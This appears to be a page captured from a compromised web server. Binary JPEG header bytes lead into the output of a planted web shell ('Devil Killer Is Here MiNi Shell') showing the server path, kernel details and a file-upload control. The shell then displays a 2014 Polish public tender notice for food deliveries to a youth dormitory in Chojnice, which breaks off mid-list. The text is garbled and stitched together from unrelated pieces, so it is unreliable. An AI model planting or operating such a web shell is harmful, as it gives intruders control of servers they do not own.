JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141124/384086-N-2014.html

<p class="kh_header"><b>Chojnice: dostawy sukcesywne artykułów żywnościowych z podziałem na części</b><br>
<b>Numer ogłoszenia: 384086 - 2014; data zamieszczenia: 24.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Bursa dla Młodzieży Szkolnej , ul. Świętopełka 1, 89-620 Chojnice, woj. pomorskie, tel. 0-52 3972996, faks 0-52 3972996.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bursa.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy sukcesywne artykułów żywnościowych z podziałem na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy sukcesywne artykułów żywnościowych, zgodnie z poniższym podziałem na części zwanych dalej pakietami:

Pakiet I - dostawa mięsa i wędlin, których ilość i asortyment zostały określone w załączniku nr 1 do SIWZ,
Wspólny słownik zamówień (CPV): 15.10.00.00-9

Pakiet II  - dostawa mleka i artykułów mleczarskich, których ilość i asortyment zostały określone w załączniku nr 2 do SIWZ,
Wspólny słownik zamówień (CPV): 15.50.00.00-3



Pakiet III -  dostawa pieczywa, panierki i ciasta, których ilość i asortyment zostały określone w załączniku nr 3 do SIWZ,
Wspólny słownik zamówień (CPV): 15.81.00.00-9



Pakiet IV - dostawa warzyw i owoców, których ilość i asortyment zostały określone w załączniku nr 4 do SIWZ,
Wspólny słownik zamówień (CPV): 03.22.00.00-9



Pakiet V - dostawa ryb i artykułów mrożonych, których ilość i asortyment zostały określone w załączniku nr 5 do SIWZ,
Wspólny słownik zamówień (CPV): 15.22.00.00-6, 15.20.00.00-0, 15.89.60.00-5



Pakiet VI - dostawa artykułów spożywczych, których ilość i asortyment zostały określone w załączniku nr 6 do SIWZ,
Wspólny słownik zamówień (CPV): 15.80.00.00-6



Pakiet VII - dostawa ziemniaków jadalnych, których ilość i została określona w załączniku nr 7 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1



Pakiet VIII - dostawa ziemniaków jadalnych których ilość została określona w załączniku nr 8 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1



Pakiet IX  - dostawa ziemniaków jadalnych, których ilość została określona w załączniku nr 9 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1




Pakiet X - dostawa ziemniaków jadalnych, których ilość została określona w załączniku nr 10 do SIWZ,
Wspólny słownik zamówień (CPV): 03.21.21.00-1.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.81.00.00-9, 03.22.00.00-9, 03.21.21.00-1, 15.10.00.00-9, 15.22.00.00-6, 15.20.00.00-0, 15.89.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uzna się za spełniony jeżeli Wykonawca wykażę, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał lub wykonuje co najmniej  1 dostawę w zakresie realizacji odpowiadających swoim rodzajem przedmiotowi zamówienia o wartości nie mniejszej niż
Pakiet I - 20 000,00 PLN
Pakiet II - 20 000,00 PLN
Pakiet III - 20 000,00 PLN
Pakiet IV - 20 000,00 PLN
Pakiet V - 20 000,00 PLN
Pakiet VI - 20 000,00 PLN
Pakiet VII - 5 000,00 PLN
Pakiet VIII - 5 000,00 PLN
Pakiet IX - 5 000,00 PLN
Pakiet X - 5 000,00 PLN
 każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bursa.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach
ul. Świętopełka 1
89-620 Chojnice p. 101 sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2014 godzina 08:30, miejsce: Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach
ul. Świętopełka 1
89-620 Chojnice p. 101 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	baleron gotowany	kg	5
2	kiełbasa biała parzona	kg	70
3	kiełbasa jałowcowa	kg	5
4	kiełbasa krakowska parzona	kg	25
5	kiełbasa krakowska sucha	kg	40
6	kiełbasa zwyczajna	kg	120
7	szynka w galarecie	kg	5
8	metka łososiowa	kg	35
9	ogonówka  parzona	kg	70
10	parówki cienkie zawartość mięsa min 80%	kg	120
11	pasztet pieczony	kg	25
12	pasztetowa wieprzowa 	kg	20
13	pasztet z przyprawami	kg	20
14	pieczeń kanapkowa	kg	20
15	piwna	kg	40
16	polędwica sopocka	kg	90
17	serdelki wieprzowe zawart. mięsa min. 40%	kg	50
18	szynka wiejska	kg	50
19	szynka gotowana w siatce	kg	50
20	szynka konserwowa z kurczaka	kg	40
21	szynka cygańska	kg	35
22	łopatka z przyprawami	kg	50
23	szynkówka	kg	85
24	szynkowa z indyka	kg	70
25	szynkówka drobiowa	kg	50
26	tatrzańska	kg	40
27	szynka konserwowa	kg	50
28	schab w przyprawach	kg	40
29	salami	kg	20
30	salami w przyprawach	kg	20
31	żywiecka	kg	45
32	pierś z indyka wędzona	kg	30
33	filet wędzony z indyka	kg	30
34	szynka delikatna z fileta zawart. mięsa min 85%	kg	25
35	 schab wieprzowy z/k	kg	50
36	 schab wieprzowy b/k	kg	450
37	 karkówka wiep. z/k	kg	20
38	 karkówka wiep. b/k	kg	260
39	 łopatka wieprzowa b/k	kg	200
40	mięso wieprzowe b/k  szynka myszka  	kg	250
41	 wołowina extra	kg	10
42	 wątroba wieprzowa	kg	5
43	łopatka mielona	kg	400
44	 kości 	kg	10
45	 boczek surowy	kg	60
46	 boczek wędzony paski	kg	170
47	 kurczaki świeże	kg	220
48	 filety z kurczaka-piersi	kg	650
49	 pałki z kurczaka	kg	20
50	udka z kurczaka	kg	300
51	 porcje rosołowe	kg	350
52	filet z indyka piersi	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mleka i artykułów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jogurt z kawałkami owoców 150g	szt	700
2	Jogurt owocowy 150g	szt	1500
3	Jogurt naturalny 150g	szt	120
4	Masło śmietankowe zawartość tłuszczu
 min 82% tłuszczu 200g	szt	1400
5	Mleko UHT o zawrt. tłuszczu  2%	litr	6600
6	Ser żółty twardy Edamski zawartość tłuszczu w suchej masie min 40%	kg	40
7	Ser żółty twardy Królewski zawartość tłuszczu w suchej masie min 40%	kg	100
8	Ser żółty twardy Salami zawartość tłuszczu w suchej masie min 40%	kg	350
9	Ser żółty twardy dziurawiec zawartość tłuszczu w suchej masie min 40%	kg	80
10	Ser żółty twardy Gouda zawartość tłuszczu  w suchej masie min 40%	kg	120
11	Ser topiony (kostka)  skład: ser dojrzewający min 27% 	kg	120
12	ser topiony zegar 200g	szt	150
13	ser topiony plastry 150g	szt	300
14	ser twarogowy plastry 150g	szt	300
15	Ser twardy wędzony	kg	40
16	Serek kanapkowy  twarogowy z dodatkami 150g	szt	150
17	Serek homogenizowany 150g	szt	2000
18	Serek twarożkowy 200g	szt	300
19	Śmietanka 18% słodka 500ml	szt	1000
20	Śmietana 30% słodka 500ml 	szt	20
21	Twarożek grani 200g	szt	200
22	Twaróg półtłusty kostka 200g	szt	1800
23	Wyrób seropodobny dobrze topiący się	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa pieczywa panierki i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb (krojony)	1200kg
2	Panierka	165kg
3	Bułka wrocławska	2000kg
4	Chleb razowy (krojony)	230kg
5	Chleb graham (krojony)	50kg
6	Chleb słonecznikowy (krojony)	900kg
7	Chleb wiejski (krojony)	100kg
8	Chleb wieloziarnisty (krojony)	400kg
9	Drożdżówka - sznek	80kg
10	Bułka podłużna do zapiekanki	144kg
11	Pączek	70kg
12	Spód do pizzy	60kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	banany	kg	50
2	brokuły	kg	40
3	brukiew	kg	70
4	brzoskwinie	kg	50
5	buraki	kg	450
6	cebula	kg	300
7	cytryna	kg	7
8	fasola szparagowa	kg	20
9	gruszki	kg	20
10	jabłka	kg	1000
11	kalafior	szt	50
12	kapusta czerwona	kg	200
13	kapusta kiszona	kg	310
14	kapusta pekińska	kg	300
15	Kapusta  świeża	kg	600
16	kapusta biała-młoda 	szt	80
17	kapusta włoska	kg	50
18	kiwi	kg	35
19	koper	pęczek	350
20	koper	kg	10
21	mandarynka	kg	150
22	marchew płukana	kg	1100
23	nektarynki	kg	50
24	ogórek kiszony	kg	300
25	ogórek świeży	kg	500
26	papryka świeża	kg	150
27	pieczarki	kg	500
28	pietruszka korzeń płukana	kg	130
29	pietruszka nać	pęczek	100
30	pomarańcz	kg	80
31	pomidor	kg	500
32	por	kg	130
33	Por młody	szt	100
34	rzodkiewka	pęczek	100
35	rzodkiew biała	kg	100
36	sałata	szt	380
37	seler płukany	kg	320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa ryb i artykułów mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	makrela wędzona - tuszki	kg	90
2	delfinki - mrożone	kg	20
3	kotlet rybny - mrożony	kg	90
4	panga mrożona	kg	80
5	kostka z mintaja	kg	100
6	kostka z mintaja panierowana	kg	40
7	kostka z morszczuka	kg	60
8	tilapia filet - glazura min 15%	kg	80
9	dorsz czerniak - filet (szaterpak)	kg	50
10	miruna ze skórą - filet (szaterpak)	kg	80
11	kalafior mrożony	kg	200
12	brokuły mrożone	kg	80
13	mieszanka - leczo 450g - WARZYWNA	szt	50
14	mieszanka kompotowa 450g	szt	100
15	wiśnie mrożone b/p 450g	szt	80
16	sałatka pik. z makreli EO 	szt	400
17	śledź Bismarck	kg	40
18	śledź Matyjas	kg	15
19	brukselka	kg	100
20	marchew mini	kg	100
21	śledź - filet w pomidorze	szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.20.00.00-0, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa artykułów spożywaczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ananasy konserwowe plastry	565g	szt	180
2	Batonik toffi w czekoladzie	45g	szt	400
3	Batonik z orzeszkami w czekoladzie	50g	szt	500
4	Budyń	65g	szt	30
5	Chrzan tarty	200g	szt	15
6	Ciastka kruche różne kształty i smaki	1kg	kg	40
7	Cukier biały kryształ	1kg	kg	600
8	Cukier puder	500g	kg	14
9	Cukier waniliowy	16g	szt	200
10	Cukierki czekoladowe z nadzieniem różne smaki	1kg	kg	25
11	Cukierki owocowe różne smaki	1kg	kg	15
12	Cukierki toffi różne smaki	1kg	kg	10
13	Cynamon	15g	szt	20
14	Czekolada gorzka	100g	szt	10
15	Czekolada z dodatkami
Skład: masa kakaowa minimum 30%, masa mleczna minimum 15%	100g	szt	200
16	Czosnek granulowany	25g	szt	20
17	Drożdże	100g	szt	20
18	Dżem brzoskwiniowy niskosłodzony pełen kawałków owoców bez konserwantów (E202, E211)	280g	szt	600
19	Dżem czarna porzeczka niskosłodzony pełen kawałków owoców bez konserwantów (E202, E211)	280g	szt	500
20	Dżem truskawkowy niskosłodzony
pełen kawałków owoców
bez konserwantów (E202, E211)	280g	szt	800
21	Dżem wiśniowy niskosłodzony pełen kawałków owoców bez konserwantów (E202, E211)	280g	szt	500
22	Fasola sucha	500g	szt	130
23	Fasolka konserwowa czerwona	400g	szt	100
24	Fasolka konserwowa w słoiku	900ml po
odcieku
510g	szt	200
25	Galaretka owocowa (różne smaki)	50g	szt	15
26	Groch konserwowy
Skład: groszek zielony, woda, sól
Wartość odżywcza w 100g wyrobu 64 kcal	400g po
odcieku
240g	szt	750
27	Groch suchy	500g	szt	80
28	Herbata indyjska granulowana	100g	szt	200
29	Herbata ekspresowa, dwukomorowa z zawieszką (starannie dobrana kompozycja wysokiej jakości czarnych herbat o klasycznym smaku i aromacie)	100g	szt	10
30	herbata miętowa ekspresowa	100g	szt	10
31	Jajka kurze (klasa L)*	szt	szt	7000
32	Kakao ciemne niskotłuszczowe
(10%-12% tłuszczu)	150g	szt	240
33	Kasza jęczmienna z zastosowaniem do zup i II dań	1kg	kg	200
34	Kasza manna	1000g	kg	8
35	Kawa inka	150g	szt	50
36	Kawa naturalna - drobno mielona z wyselekcjonowanych ziaren arabiki o delikatnym smaku i przyjemnym aromacie	500g	szt	15
37	Kawa rozpuszczalna - kawa liofilizowana z 100% kawy naturalnej	100g	szt	15
38	Ketchup
Skład: koncentrat pomidorowy min 37%	500g	szt	200
39	Kompot agrestowy	900ml 	szt	20
40	Koncentrat pomidorowy 30%	900ml	szt	220
41	Koper susz	6g	szt	30
42	Kukurydza konserwowa
Skład:kukurudza, woda, sól, cukier
Wartość odżywcza 100g produktu 115kcal, białko 3,9g, węglowodany przyswajalne 22g, tłuszcz całkowitny 1,3g 	400g po odcieku 220g	szt	500
43	Kwasek cytrynowy	20g	szt	100
44	Liść laurowy	10g	szt	20
45	Majeranek	10g	szt	160
46	Majonez
Skład: olej roślinny, woda, ocet spirytusowy, cukier, żółtko kurze w proszku 2,2%, sól gorczyca	620ml	szt	180
47	Makaron, po ugotowaniu nie lepiący się, odpowiednio twardy, sprężysty, zachowuje naturalny zapach i kolor
Skład: mąka makaronowa pszenna, woda, substancja wzbogająca-witamina A, 600wartość energetyczna w 100g 336kcal	500g	szt	650
48	Margaryna do pieczenia
- barwnik beta-karoten, zawart. sodu 0,09g, zawart. Tłuszczu min 72%	250g	szt	70
49	Margaryna do pieczywa z masłem zawartość tłuszczu min 39% z niską zawartością soli	500g	szt	550
50	Marmolada wieloowocowa - twarda	1000g	szt	15
51	Masło czekoladowe do pieczywa	350g	szt	30
52	Mąka pszenna typ 500
Zastosowanie: jako zawiesina do zup i
 sosów do pieczenia ciast	1kg	kg	450
53	Mąka ziemniaczana
Skład: skrobia ziemniaczana	1kg	kg	100
54	Miód sztuczny	350g	szt	10
55	Mleko skondensowane słodzone w puszce	510g	szt	15
56	Musztarda
Skład: woda, gorczyca, ocet spirytusowy, cukier, sól, przyprawy	200g	szt	120
57	Ocet	500ml	szt	100
58	Ogórki konserwowe	900ml	szt	300
59	Olej uniwersalny	1000ml	szt	350
60	Papryka konserwowa	900ml	szt	150
61	Papryka sucha	20g	szt	120
62	Pieprz mielony	20g	szt	400
63	Pieprz ziarnisty	15g	szt	80
64	Płatki kukurydziane
Skład:kukurydza 98%	500g	szt	30
65	Płatki sniadaniowe w różnych smakach z pełnego ziarna	250g	szt	70
66	Płatki jęczmienne błyskawiczne	500g	szt	20
67	Proszek do pieczenia	30g	szt	160
